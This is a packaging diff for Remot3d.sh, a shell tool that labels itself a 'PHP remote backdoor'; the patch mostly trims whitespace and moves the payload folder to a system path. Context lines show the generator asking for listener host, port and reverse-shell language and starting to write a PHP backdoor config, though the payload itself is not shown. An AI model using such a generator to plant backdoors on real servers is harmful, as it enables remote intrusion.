--- src/remot3d/Remot3d.sh	2019-07-29 22:59:19.133333003 +0200
+++ Remot3d.sh	2019-07-29 22:59:40.516666337 +0200
@@ -1,4 +1,4 @@
-#!/bin/bash   
+#!/bin/bash
 #                          WARNING !
 ##############################################################
 # This is a USELESS Project, if you like it just donate
@@ -35,8 +35,8 @@
 nc="\e[0m"                                                  ##
 ##############################################################
 checking_installation() {
-payloads_folder=$(ls -a $HOME | grep ".rmtd-payloads")
-if [[ $payloads_folder == ".rmtd-payloads" ]];then
+payloads_folder="/usr/share/remot3d/rmtd-payloads"
+if [[ $payloads_folder == "/usr/share/remot3d/rmtd-payloads" ]];then
 clear
 printf "\e[8;27;93t"
 spinlong
@@ -64,7 +64,7 @@
 fi
 }
 banner1 () {
-    printf "${green}     
+    printf "${green}
       ╔═══════════════════════════════════════════════════════╗
       ║   ______                        __  ${yellow}  ______ ${green}    __   ║
       ║  |   __ \.-----.--------.-----.|  |_${yellow} |__    |${green}.--|  |  ║
@@ -74,36 +74,36 @@
       ╠═════════════════╦═════════════════════════════════════╣
       ║   ${yellow}Version ${white}2.0${green}   ║   ${white}Coded by ${yellow}B1P0L4R ${white}- ${yellow}IndoXploit.${green}    ║
       ╚═════════════════╩═════════════════════════════════════╝\n"
-}                                                                             
+}
 banner2 () {
     printf "${red}
-          @@@@@@@   @@@@@@@@  @@@@@@@@@@    @@@@@@   @@@@@@@  ${blue}@@@@@@   ${red}@@@@@@@   
-          @@@@@@@@  @@@@@@@@  @@@@@@@@@@@  @@@@@@@@  @@@@@@@  ${blue}@@@@@@@  ${red}@@@@@@@@  
-          @@!  @@@  @@!       @@! @@! @@!  @@!  @@@    @@!    ${blue}    @@@  ${red}@@!  @@@  
-          !@!  @!@  !@!       !@! !@! !@!  !@!  @!@    !@!    ${blue}    @!@  ${red}!@!  @!@  
-          @!@!!@!   @!!!:!    @!! !!@ @!@  @!@  !@!    @!!    ${blue}@!@!!@   ${red}@!@  !@!  
-          !!@!@!    !!!!!:    !@!   ! !@!  !@!  !!!    !!!    ${blue}!!@!@!   ${red}!@!  !!!  
-          !!: :!!   !!:       !!:     !!:  !!:  !!!    !!:    ${blue}    !!:  ${red}!!:  !!!  
-          :!:  !:!  :!:       :!:     :!:  :!:  !:!    :!:    ${blue}    :!:  ${red}:!:  !:!  
-          ::   :::   :: ::::  :::     ::   ::::: ::     ::    ${blue}:: ::::  ${red} :::: ::  
-          :   : :  : :: ::    :      :     : :  :      :     ${blue} : : :   ${red}:: :  : 
-                        ${blue}--------------------------------------                 
+          @@@@@@@   @@@@@@@@  @@@@@@@@@@    @@@@@@   @@@@@@@  ${blue}@@@@@@   ${red}@@@@@@@
+          @@@@@@@@  @@@@@@@@  @@@@@@@@@@@  @@@@@@@@  @@@@@@@  ${blue}@@@@@@@  ${red}@@@@@@@@
+          @@!  @@@  @@!       @@! @@! @@!  @@!  @@@    @@!    ${blue}    @@@  ${red}@@!  @@@
+          !@!  @!@  !@!       !@! !@! !@!  !@!  @!@    !@!    ${blue}    @!@  ${red}!@!  @!@
+          @!@!!@!   @!!!:!    @!! !!@ @!@  @!@  !@!    @!!    ${blue}@!@!!@   ${red}@!@  !@!
+          !!@!@!    !!!!!:    !@!   ! !@!  !@!  !!!    !!!    ${blue}!!@!@!   ${red}!@!  !!!
+          !!: :!!   !!:       !!:     !!:  !!:  !!!    !!:    ${blue}    !!:  ${red}!!:  !!!
+          :!:  !:!  :!:       :!:     :!:  :!:  !:!    :!:    ${blue}    :!:  ${red}:!:  !:!
+          ::   :::   :: ::::  :::     ::   ::::: ::     ::    ${blue}:: ::::  ${red} :::: ::
+          :   : :  : :: ::    :      :     : :  :      :     ${blue} : : :   ${red}:: :  :
+                        ${blue}--------------------------------------
                            ${white}PHP REMOTE BACKDOOR - BY ${red}B1P0L4R
 \n"
-}                      
+}
 banner3(){
     printf "${green}
-       __----_ 
-     /##|       \ 
-    /###|     |  \______ 
-   |####|               \ 
+       __----_
+     /##|       \
+    /###|     |  \______
+   |####|               \
    |####|      ___   ___|${white}© ${green}
-   \####/     _____ /            
-     \###    /                       
+   \####/     _____ /
+     \###    /
      ${white}=====ÊšçØ      ╔═╗┬ ┬┌─┐  ╦═╗┌─┐┌┬┐┌─┐┌┬┐┌─┐${green}      //
-     /        \     ${white}╠═╝├─┤├─┘  ╠╦╝├┤ ││││ │ │ ├┤ ${green}     //   
-    |   |_      \   ${white}╩  ┴ ┴┴    ╩╚═└─┘┴ ┴└─┘ ┴ └─┘${green}    //${white}  But it's useless !${green} 
-    \___/      |    ${cyan}╔╗ ╔═╗╔═╗╦╔═╔╦╗╔═╗╔═╗╦═╗      ${green}  //${white}      you can't control his heart${green} 
+     /        \     ${white}╠═╝├─┤├─┘  ╠╦╝├┤ ││││ │ │ ├┤ ${green}     //
+    |   |_      \   ${white}╩  ┴ ┴┴    ╩╚═└─┘┴ ┴└─┘ ┴ └─┘${green}    //${white}  But it's useless !${green}
+    \___/      |    ${cyan}╔╗ ╔═╗╔═╗╦╔═╔╦╗╔═╗╔═╗╦═╗      ${green}  //${white}      you can't control his heart${green}
      \         /    ${cyan}╠╩╗╠═╣║  ╠╩╗ ║║║ ║║ ║╠╦╝      ${green} //
       |    |__|__   ${cyan}╚═╝╩ ╩╚═╝╩ ╩═╩╝╚═╝╚═╝╩╚═     ${green} //
       (______)___)  ${yellow}Version 2.0 - Stable
@@ -122,7 +122,7 @@
                       ${red}(_)\n"
 }
 banner5() {
-printf "${white}                                                                     
+printf "${white}
       ┌──────────────────────────────────────────────────────────────────────────────┐
       │                            * ${grey}System Admin Login${white} *                            │
       ├──────────────────────────────────────────────────────────────────────────────┤
@@ -188,7 +188,7 @@
     read L_PORT
     printf "      ${white}[${green}+${white}] Set Exploit Language (${green}bash, perl, python, php, ruby, netcat, nc.${white}) : "
     read lang_rev
-    cat << EOF > $out_name 
+    cat << EOF > $out_name
 <?php
 \$config["ip"] = "$L_HOST";
 \$config["port"] = "$L_PORT";
@@ -285,7 +285,7 @@
         clear
     banner_changer
         options
-        chooser 
+        chooser
         else
         exit
         fi
